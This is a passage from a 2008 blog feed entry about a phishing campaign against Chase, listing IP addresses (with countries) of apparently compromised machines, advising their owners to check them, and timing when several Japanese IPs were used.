Texas &lt;br /&gt;76.226.171.237 USA - Texas &lt;br /&gt;76.226.188.247 USA - Texas &lt;br /&gt;76.226.66.184 USA - Texas &lt;br /&gt;76.226.82.168 USA - Texas &lt;br /&gt;76.226.90.125 USA - Texas &lt;br /&gt;76.232.224.223 USA - Texas &lt;br /&gt;76.234.133.223 USA - Texas &lt;br /&gt;76.234.138.225 USA - Texas &lt;br /&gt;76.251.81.85 USA - Texas &lt;br /&gt;76.251.83.139 USA - Texas &lt;br /&gt;76.251.83.157 USA - Texas &lt;br /&gt;76.251.83.217 USA - Texas &lt;br /&gt;76.252.185.129 USA - Texas &lt;br /&gt;76.252.189.68 USA - Texas &lt;br /&gt;76.27.148.240 USA - New Jersey &lt;br /&gt;77.100.42.202 United Kingdom &lt;br /&gt;77.126.235.37 Israel &lt;br /&gt;77.184.94.178 Germany &lt;br /&gt;77.41.109.184 Russian Federation &lt;br /&gt;78.42.185.106 Germany &lt;br /&gt;78.42.187.15 Germany &lt;br /&gt;78.53.112.224 Germany &lt;br /&gt;78.53.115.107 Germany &lt;br /&gt;78.53.115.246 Germany &lt;br /&gt;78.96.169.60 Romania &lt;br /&gt;79.117.198.30 Romania &lt;br /&gt;79.117.204.71 Romania &lt;br /&gt;79.117.86.21 Romania &lt;br /&gt;79.118.233.104 Romania &lt;br /&gt;79.118.233.133 Romania &lt;br /&gt;79.118.233.184 Romania &lt;br /&gt;79.118.233.60 Romania &lt;br /&gt;79.118.234.13 Romania &lt;br /&gt;79.118.234.32 Romania &lt;br /&gt;79.142.170.18 Russian Federation &lt;br /&gt;79.164.61.132 Russian Federation &lt;br /&gt;79.165.223.91 Russian Federation &lt;br /&gt;80.2.63.234 United Kingdom &lt;br /&gt;81.101.230.224 United Kingdom &lt;br /&gt;81.110.166.60 United Kingdom &lt;br /&gt;81.141.211.13 United Kingdom &lt;br /&gt;81.203.80.40 Spain &lt;br /&gt;81.203.89.45 Spain &lt;br /&gt;81.96.34.100 United Kingdom &lt;br /&gt;82.10.227.196 United Kingdom &lt;br /&gt;82.11.47.220 United Kingdom &lt;br /&gt;82.13.107.180 United Kingdom &lt;br /&gt;82.13.84.146 United Kingdom &lt;br /&gt;82.17.75.240 United Kingdom &lt;br /&gt;82.18.60.242 United Kingdom &lt;br /&gt;82.20.249.167 United Kingdom &lt;br /&gt;82.200.227.62 Kazakhstan &lt;br /&gt;82.21.223.160 United Kingdom &lt;br /&gt;82.21.226.51 United Kingdom &lt;br /&gt;82.3.206.34 United Kingdom &lt;br /&gt;82.33.53.67 United Kingdom &lt;br /&gt;82.38.35.93 United Kingdom &lt;br /&gt;82.39.65.27 United Kingdom &lt;br /&gt;82.40.118.13 United Kingdom &lt;br /&gt;82.40.149.96 United Kingdom &lt;br /&gt;82.40.240.90 United Kingdom &lt;br /&gt;82.44.225.124 United Kingdom &lt;br /&gt;82.44.37.132 United Kingdom &lt;br /&gt;83.23.123.137 Poland &lt;br /&gt;83.254.19.246 Sweden &lt;br /&gt;84.121.118.24 Spain &lt;br /&gt;84.126.24.81 Spain &lt;br /&gt;84.126.31.131 Spain &lt;br /&gt;84.56.103.15 Germany &lt;br /&gt;84.56.119.24 Germany &lt;br /&gt;84.56.80.19 Germany &lt;br /&gt;85.216.125.210 Germany &lt;br /&gt;85.216.125.43 Germany &lt;br /&gt;86.0.209.6 United Kingdom &lt;br /&gt;86.122.146.169 Romania &lt;br /&gt;86.15.140.68 United Kingdom &lt;br /&gt;86.15.143.160 United Kingdom &lt;br /&gt;86.175.176.93 United Kingdom &lt;br /&gt;86.5.237.166 United Kingdom &lt;br /&gt;86.9.137.35 United Kingdom &lt;br /&gt;87.179.204.12 Germany &lt;br /&gt;87.179.226.80 Germany &lt;br /&gt;87.224.233.52 Russian Federation &lt;br /&gt;87.69.167.156 Israel &lt;br /&gt;87.70.245.150 Israel &lt;br /&gt;88.18.129.105 Spain &lt;br /&gt;89.102.187.44 Czech Republic &lt;br /&gt;89.103.102.100 Czech Republic &lt;br /&gt;89.137.210.212 Romania &lt;br /&gt;89.138.52.188 Israel &lt;br /&gt;89.208.65.230 Russian Federation &lt;br /&gt;89.223.26.229 Russian Federation &lt;br /&gt;89.247.98.176 Germany &lt;br /&gt;89.41.182.181 Romania &lt;br /&gt;91.108.67.46 United Kingdom &lt;br /&gt;91.123.159.112 Ukraine &lt;br /&gt;91.89.164.106 Germany &lt;br /&gt;91.89.200.120 Germany &lt;br /&gt;91.89.200.255 Germany &lt;br /&gt;92.101.10.72 Russian Federation &lt;br /&gt;92.11.226.17 United Kingdom &lt;br /&gt;92.114.74.6 Romania &lt;br /&gt;92.192.100.173 Germany &lt;br /&gt;92.233.26.189 United Kingdom &lt;br /&gt;92.235.49.58 United Kingdom &lt;br /&gt;92.252.242.145 Russian Federation &lt;br /&gt;92.61.238.186 Israel &lt;br /&gt;93.188.86.159 Russian Federation &lt;br /&gt;93.80.109.149 Russian Federation &lt;br /&gt;93.80.168.176 Russian Federation &lt;br /&gt;93.80.170.189 Russian Federation &lt;br /&gt;93.80.99.222 Russian Federation &lt;br /&gt;94.52.26.211 Romania &lt;br /&gt;95.24.154.126 Russian Federation &lt;br /&gt;95.24.201.91 Russian Federation &lt;br /&gt;95.24.240.124 Russian Federation &lt;br /&gt;95.24.32.170 Russian Federation &lt;br /&gt;97.82.50.128 USA - Missouri &lt;br /&gt;98.141.74.204 USA - Virginia &lt;br /&gt;98.174.198.85 USA - Georgia &lt;br /&gt;98.217.125.105 USA - New Jersey &lt;br /&gt;98.218.21.87 USA - New Jersey &lt;br /&gt;98.222.245.254 USA - New Jersey &lt;br /&gt;99.131.50.175 USA - Texas &lt;br /&gt;99.140.243.14 USA - Texas &lt;br /&gt;99.141.1.149 USA - Texas &lt;br /&gt;99.145.85.134 USA - Texas &lt;br /&gt;99.151.125.173 USA - Texas &lt;br /&gt;99.228.208.25 Canada&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;random&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;If any of those IPs is yours, you might want to check your machine for problems.&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;random&gt;&lt;/p&gt;&lt;p&gt;__________________________________&lt;/p&gt;&lt;p&gt;A quick timetable of abused IPs (Japan):&lt;/p&gt;&lt;p&gt;114.145.62.47&lt;br /&gt;Tue Dec 30 10:36:19 - Tue Dec 30 14:37:17&lt;br /&gt;&lt;br /&gt;114.164.132.216 &lt;br /&gt;Sat Dec 27 04:21:15 - Sat Dec 27 05:21:22 &lt;br /&gt;Sat Dec 27 05:51:24 - Sat Dec 27 06:21:26 &lt;br /&gt;Sat Dec 27 12:32:36 - Sat Dec 27 13:33:06 &lt;br /&gt;&lt;br /&gt;114.182.11.127 &lt;br /&gt;Sun Dec 28 13:46:28 - Sun Dec 28 20:57:32 &lt;br /&gt;&lt;br /&gt;114.182.58.206 &lt;br /&gt;Fri Dec 26 18:49:16 - Fri Dec 26 19:19:19 &lt;br /&gt;Fri Dec 26 20:19:30 - Fri Dec 26 21:49:53 &lt;br /&gt;&lt;br /&gt;118.15.181.227 &lt;br /&gt;Fri Dec 26 14:04:48 - Fri Dec 26 14:48:22 &lt;br /&gt;&lt;br /&gt;118.19.70.69 &lt;br /&gt;Sat Dec 27 18:53:39 - Sun Dec 28 00:24:18 &lt;br /&gt;&lt;br /&gt;118.8.122.197 &lt;br /&gt;Sun Dec 28 06:35:05 - Sun Dec 28 07:05:13 &lt;br /&gt;Sun Dec 28 08:05:22 - Sun Dec 28 14:46:38 &lt;br /&gt;&lt;br /&gt;121.113.181.142&lt;br /&gt;Tue Dec 30 19:08:06 - Tue Dec 30 20:08:21&lt;br /&gt;Tue Dec 30 20:38:30 - Tue Dec 30 22:08:43&lt;br /&gt;&lt;br /&gt;121.113.182.244&lt;br /&gt;Tue Dec 30 09:36:03 - Tue Dec 30 16:37:36&lt;br /&gt;&lt;br /&gt;210.249.74.115 &lt;br /&gt;Sun Dec 28 14:46:38 - Sun Dec 28 21:27:39&lt;br /&gt;&lt;br /&gt;211.128.182.235 &lt;br /&gt;Fri Dec 26 14:18:15 - Fri Dec 26 16:18:43 &lt;br /&gt;&lt;br /&gt;211.128.182.40 &lt;br /&gt;Fri Dec 26 16:48:46 - Fri Dec 26 18:19:09 &lt;br /&gt;&lt;br /&gt;218.44.41.132 &lt;br /&gt;Sat Dec 27 12:02:33 - Sat Dec 27 12:32:36 &lt;br /&gt;&lt;br /&gt;219.110.78.126 &lt;br /&gt;Sun Dec 28 09:35:38 - Sun Dec 28 12:16:16&lt;br /&gt;&lt;br /&gt;219.126.121.249&lt;br /&gt;Mon Dec 29 14:31:57 - Mon Dec 29 17:32:39&lt;br /&gt;&lt;br /&gt;219.126.123.144&lt;br /&gt;Tue Dec 30 20:08:21 - Tue Dec 30 20:38:30&lt;br /&gt;&lt;br /&gt;220.109.1.62 &lt;br /&gt;Sun Dec 28 12:16:16 - Sun Dec 28 12:46:18 &lt;br /&gt;&lt;br /&gt;220.109.147.167 &lt;br /&gt;Sun Dec 28 19:57:18 - Sun Dec 28 21:27:39&lt;br /&gt;&lt;br /&gt;220.148.160.212&lt;br /&gt;Tue Dec 30 20:38:30 - Wed Dec 31 02:10:00&lt;br /&gt;&lt;br /&gt;220.148.162.250&lt;br /&gt;Tue Dec 30 17:07:38 - Tue Dec 30 18:38:03&lt;br /&gt;&lt;br /&gt;220.148.163.182 &lt;br /&gt;Sun Dec 28 02:54:40 - Sun Dec 28 03:24:42 &lt;br /&gt;&lt;br /&gt;220.221.18.140&lt;br /&gt;Mon Dec 29 18:02:42 - Tue Dec 30 00:33:55&lt;br /&gt;&lt;br /&gt;222.150.156.30 &lt;br /&gt;Fri Dec 26 19:19:19 - Fri Dec 26 19:49:22 &lt;br /&gt;&lt;br /&gt;58.190.43.53 &lt;br /&gt;Sat Dec 27 09:32:00 - Sat Dec 27 10:02:07 &lt;br /&gt;&lt;br /&gt;58.89.120.228 &lt;br /&gt;Fri Dec 26 19:49:22 - Fri Dec 26 20:19:30&lt;br /&gt;&lt;br /&gt;60.43.10.44&lt;br /&gt;Mon Dec 29 19:02:49 - Mon Dec 29 20:03:00&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;random&gt;&lt;/p&gt;&lt;p&gt;&lt;random&gt;&lt;/p&gt;&lt;p&gt;&lt;random&gt;&lt;/p&gt;&lt;p&gt;Above list clearly shows that some IPs were used just once, some for only 30 minutes.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;/random&gt;&lt;p&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1174024596384276838-1338831291638517698?l=michajp.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://michajp.blogspot.com/feeds/1338831291638517698/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1174024596384276838&amp;postID=1338831291638517698' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1174024596384276838/posts/default/1338831291638517698'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1174024596384276838/posts/default/1338831291638517698'/><link rel='alternate' type='text/html' href='http://michajp.blogspot.com/2008/12/phishing-attack-on-chase-dec-2008.html' title='Phishing Attack on Chase (DEC 2008)'/><author><name>mimojapan</name><uri>http://www.blogger.com/profile/09620575355384006452</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/_GnPGhaRiJaY/StMwkCT2YLI/AAAAAAAAA-s/vZmUu5LYXiA/S220/mimo09b.jpg'/></author><thr:total>0</thr:total></entry></feed>
